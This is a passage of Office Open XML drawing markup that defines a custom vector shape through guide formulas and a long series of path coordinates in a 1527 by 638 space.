                  <a:gd name="T8" fmla="*/ 0 w 1527"/>
                  <a:gd name="T9" fmla="*/ 0 h 638"/>
                  <a:gd name="T10" fmla="*/ 0 w 1527"/>
                  <a:gd name="T11" fmla="*/ 0 h 638"/>
                  <a:gd name="T12" fmla="*/ 0 w 1527"/>
                  <a:gd name="T13" fmla="*/ 0 h 638"/>
                  <a:gd name="T14" fmla="*/ 0 w 1527"/>
                  <a:gd name="T15" fmla="*/ 0 h 638"/>
                  <a:gd name="T16" fmla="*/ 0 w 1527"/>
                  <a:gd name="T17" fmla="*/ 0 h 638"/>
                  <a:gd name="T18" fmla="*/ 0 w 1527"/>
                  <a:gd name="T19" fmla="*/ 0 h 638"/>
                  <a:gd name="T20" fmla="*/ 0 w 1527"/>
                  <a:gd name="T21" fmla="*/ 0 h 638"/>
                  <a:gd name="T22" fmla="*/ 0 w 1527"/>
                  <a:gd name="T23" fmla="*/ 0 h 638"/>
                  <a:gd name="T24" fmla="*/ 0 w 1527"/>
                  <a:gd name="T25" fmla="*/ 0 h 638"/>
                  <a:gd name="T26" fmla="*/ 0 w 1527"/>
                  <a:gd name="T27" fmla="*/ 0 h 638"/>
                  <a:gd name="T28" fmla="*/ 0 w 1527"/>
                  <a:gd name="T29" fmla="*/ 0 h 638"/>
                  <a:gd name="T30" fmla="*/ 0 w 1527"/>
                  <a:gd name="T31" fmla="*/ 0 h 638"/>
                  <a:gd name="T32" fmla="*/ 0 w 1527"/>
                  <a:gd name="T33" fmla="*/ 0 h 638"/>
                  <a:gd name="T34" fmla="*/ 0 w 1527"/>
                  <a:gd name="T35" fmla="*/ 0 h 638"/>
                  <a:gd name="T36" fmla="*/ 0 w 1527"/>
                  <a:gd name="T37" fmla="*/ 0 h 638"/>
                  <a:gd name="T38" fmla="*/ 0 w 1527"/>
                  <a:gd name="T39" fmla="*/ 0 h 638"/>
                  <a:gd name="T40" fmla="*/ 0 w 1527"/>
                  <a:gd name="T41" fmla="*/ 0 h 638"/>
                  <a:gd name="T42" fmla="*/ 0 w 1527"/>
                  <a:gd name="T43" fmla="*/ 0 h 638"/>
                  <a:gd name="T44" fmla="*/ 0 w 1527"/>
                  <a:gd name="T45" fmla="*/ 0 h 638"/>
                  <a:gd name="T46" fmla="*/ 0 w 1527"/>
                  <a:gd name="T47" fmla="*/ 0 h 638"/>
                  <a:gd name="T48" fmla="*/ 0 w 1527"/>
                  <a:gd name="T49" fmla="*/ 0 h 638"/>
                  <a:gd name="T50" fmla="*/ 0 w 1527"/>
                  <a:gd name="T51" fmla="*/ 0 h 638"/>
                  <a:gd name="T52" fmla="*/ 0 w 1527"/>
                  <a:gd name="T53" fmla="*/ 0 h 638"/>
                  <a:gd name="T54" fmla="*/ 0 w 1527"/>
                  <a:gd name="T55" fmla="*/ 0 h 638"/>
                  <a:gd name="T56" fmla="*/ 0 w 1527"/>
                  <a:gd name="T57" fmla="*/ 0 h 638"/>
                  <a:gd name="T58" fmla="*/ 0 w 1527"/>
                  <a:gd name="T59" fmla="*/ 0 h 638"/>
                  <a:gd name="T60" fmla="*/ 0 w 1527"/>
                  <a:gd name="T61" fmla="*/ 0 h 638"/>
                  <a:gd name="T62" fmla="*/ 0 w 1527"/>
                  <a:gd name="T63" fmla="*/ 0 h 638"/>
                  <a:gd name="T64" fmla="*/ 0 w 1527"/>
                  <a:gd name="T65" fmla="*/ 0 h 638"/>
                  <a:gd name="T66" fmla="*/ 0 w 1527"/>
                  <a:gd name="T67" fmla="*/ 0 h 638"/>
                  <a:gd name="T68" fmla="*/ 0 w 1527"/>
                  <a:gd name="T69" fmla="*/ 0 h 638"/>
                  <a:gd name="T70" fmla="*/ 0 w 1527"/>
                  <a:gd name="T71" fmla="*/ 0 h 638"/>
                  <a:gd name="T72" fmla="*/ 0 w 1527"/>
                  <a:gd name="T73" fmla="*/ 0 h 638"/>
                  <a:gd name="T74" fmla="*/ 0 w 1527"/>
                  <a:gd name="T75" fmla="*/ 0 h 638"/>
                  <a:gd name="T76" fmla="*/ 0 w 1527"/>
                  <a:gd name="T77" fmla="*/ 0 h 638"/>
                  <a:gd name="T78" fmla="*/ 0 w 1527"/>
                  <a:gd name="T79" fmla="*/ 0 h 638"/>
                  <a:gd name="T80" fmla="*/ 0 w 1527"/>
                  <a:gd name="T81" fmla="*/ 0 h 638"/>
                  <a:gd name="T82" fmla="*/ 0 w 1527"/>
                  <a:gd name="T83" fmla="*/ 0 h 638"/>
                  <a:gd name="T84" fmla="*/ 0 w 1527"/>
                  <a:gd name="T85" fmla="*/ 0 h 638"/>
                  <a:gd name="T86" fmla="*/ 0 w 1527"/>
                  <a:gd name="T87" fmla="*/ 0 h 638"/>
                  <a:gd name="T88" fmla="*/ 0 w 1527"/>
                  <a:gd name="T89" fmla="*/ 0 h 638"/>
                  <a:gd name="T90" fmla="*/ 0 w 1527"/>
                  <a:gd name="T91" fmla="*/ 0 h 638"/>
                  <a:gd name="T92" fmla="*/ 0 w 1527"/>
                  <a:gd name="T93" fmla="*/ 0 h 638"/>
                  <a:gd name="T94" fmla="*/ 0 w 1527"/>
                  <a:gd name="T95" fmla="*/ 0 h 638"/>
                  <a:gd name="T96" fmla="*/ 0 w 1527"/>
                  <a:gd name="T97" fmla="*/ 0 h 638"/>
                  <a:gd name="T98" fmla="*/ 0 w 1527"/>
                  <a:gd name="T99" fmla="*/ 0 h 638"/>
                  <a:gd name="T100" fmla="*/ 0 w 1527"/>
                  <a:gd name="T101" fmla="*/ 0 h 638"/>
                  <a:gd name="T102" fmla="*/ 0 w 1527"/>
                  <a:gd name="T103" fmla="*/ 0 h 638"/>
                  <a:gd name="T104" fmla="*/ 0 w 1527"/>
                  <a:gd name="T105" fmla="*/ 0 h 638"/>
                  <a:gd name="T106" fmla="*/ 0 w 1527"/>
                  <a:gd name="T107" fmla="*/ 0 h 638"/>
                  <a:gd name="T108" fmla="*/ 0 w 1527"/>
                  <a:gd name="T109" fmla="*/ 0 h 638"/>
                  <a:gd name="T110" fmla="*/ 0 w 1527"/>
                  <a:gd name="T111" fmla="*/ 0 h 63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27"/>
                  <a:gd name="T169" fmla="*/ 0 h 638"/>
                  <a:gd name="T170" fmla="*/ 1527 w 1527"/>
                  <a:gd name="T171" fmla="*/ 638 h 63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27" h="638">
                    <a:moveTo>
                      <a:pt x="684" y="295"/>
                    </a:moveTo>
                    <a:lnTo>
                      <a:pt x="684" y="302"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="683" y="311"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="681" y="321"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="675" y="329"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="667" y="336"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="652" y="348"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="633" y="363"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="611" y="380"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="589" y="398"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="568" y="413"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="551" y="424"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="541" y="430"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="538" y="431"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="536" y="432"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="536" y="433"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="537" y="434"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="542" y="434"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="549" y="433"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="554" y="432"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="562" y="430"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="570" y="425"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="588" y="415"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="611" y="401"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="636" y="385"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="661" y="369"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="683" y="355"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="699" y="345"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="708" y="339"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="714" y="334"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="728" y="324"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="747" y="310"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="767" y="294"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="788" y="278"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="807" y="263"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="820" y="253"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="828" y="247"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="833" y="244"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="839" y="238"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="846" y="231"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="853" y="223"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="860" y="215"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="866" y="206"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="872" y="196"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="877" y="186"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="886" y="178"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="896" y="166"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="909" y="154"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="921" y="141"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="932" y="129"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="942" y="118"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="950" y="110"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="956" y="106"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="962" y="102"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="971" y="96"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="983" y="88"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="997" y="80"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1009" y="72"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1021" y="64"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1030" y="58"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1037" y="54"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1055" y="43"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1078" y="34"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1105" y="26"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1131" y="18"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1157" y="12"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1177" y="9"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1193" y="5"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1202" y="4"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1208" y="3"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1220" y="3"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1236" y="2"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1253" y="1"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1271" y="0"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1287" y="0"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1299" y="1"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1307" y="2"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1312" y="3"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1318" y="4"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1321" y="7"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1319" y="10"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1316" y="14"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1310" y="18"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1303" y="23"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1296" y="28"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1289" y="34"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1282" y="40"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1276" y="43"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1272" y="46"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1273" y="48"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1275" y="49"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1278" y="50"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1280" y="51"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1287" y="50"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1298" y="49"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1312" y="49"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1328" y="49"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1344" y="50"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1359" y="53"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1370" y="55"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1375" y="58"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1378" y="62"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1378" y="65"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1375" y="68"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1372" y="69"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1367" y="70"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1360" y="71"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1352" y="72"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1343" y="73"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1334" y="76"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1326" y="77"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1321" y="78"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1319" y="79"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1319" y="81"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1320" y="84"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1321" y="87"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1324" y="88"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1327" y="88"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1335" y="89"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1344" y="89"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1356" y="91"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1367" y="92"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1378" y="93"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1385" y="95"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1389" y="96"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1395" y="101"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1401" y="107"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1404" y="114"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1405" y="119"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1401" y="123"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1395" y="127"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1389" y="131"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1383" y="133"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1382" y="135"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1382" y="138"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1383" y="141"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1385" y="143"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1390" y="142"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1398" y="141"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1409" y="140"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1419" y="138"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1430" y="137"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1440" y="137"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1447" y="137"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1451" y="137"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1460" y="140"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1468" y="146"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1473" y="152"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1472" y="156"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1468" y="158"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1461" y="162"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1453" y="165"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1445" y="170"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1436" y="173"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1428" y="177"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1424" y="179"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1422" y="180"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1420" y="181"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1420" y="184"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1422" y="185"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1423" y="185"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1426" y="185"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1433" y="185"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1443" y="184"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1454" y="184"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1464" y="184"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1474" y="184"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1481" y="184"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1485" y="185"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1489" y="189"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1494" y="196"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1498" y="203"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1494" y="209"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1491" y="211"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1485" y="214"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1479" y="217"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1472" y="219"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1466" y="223"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1462" y="226"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1458" y="229"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1457" y="231"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1457" y="233"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1458" y="237"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1461" y="238"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1465" y="239"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1470" y="241"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1477" y="245"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1487" y="248"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1496" y="254"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1507" y="260"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1515" y="264"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1522" y="269"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1524" y="272"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1521" y="275"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1515" y="278"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1508" y="281"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1501" y="284"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1494" y="287"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1488" y="290"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1484" y="292"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1483" y="293"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1483" y="295"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1483" y="298"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1483" y="300"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1484" y="301"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1486" y="301"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1491" y="302"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1498" y="304"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1506" y="307"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1514" y="309"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1521" y="313"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1525" y="316"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1527" y="319"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1519" y="326"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1510" y="332"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1502" y="338"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1496" y="342"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1492" y="345"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1485" y="347"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1476" y="351"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1465" y="354"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1454" y="357"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1445" y="361"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1436" y="362"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1431" y="363"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1430" y="365"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1428" y="368"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1430" y="370"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1430" y="372"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1436" y="372"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1448" y="374"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1461" y="375"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1474" y="377"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1487" y="379"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1498" y="382"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1506" y="384"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1508" y="387"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1506" y="390"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1501" y="392"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1494" y="394"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1486" y="398"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1477" y="400"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1470" y="402"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1465" y="403"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1463" y="405"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1466" y="407"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1473" y="409"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1479" y="413"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1481" y="415"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1480" y="417"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1477" y="420"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1471" y="422"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1464" y="423"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1457" y="422"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1446" y="418"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1433" y="413"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1418" y="407"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1404" y="401"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1392" y="395"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1381" y="391"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1375" y="388"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1369" y="387"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1356" y="385"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1340" y="384"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1321" y="383"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1304" y="382"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1287" y="380"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1274" y="379"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1266" y="378"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1257" y="377"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1240" y="375"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1218" y="372"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1192" y="370"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1168" y="369"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1147" y="368"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1131" y="367"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1124" y="367"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1117" y="371"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1101" y="380"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1078" y="395"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1054" y="411"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1029" y="428"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1007" y="441"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="991" y="452"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="984" y="455"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="979" y="457"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="968" y="466"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="952" y="476"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="933" y="487"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="915" y="499"/>
                    </a:lnTo>
                    <a:lnTo>
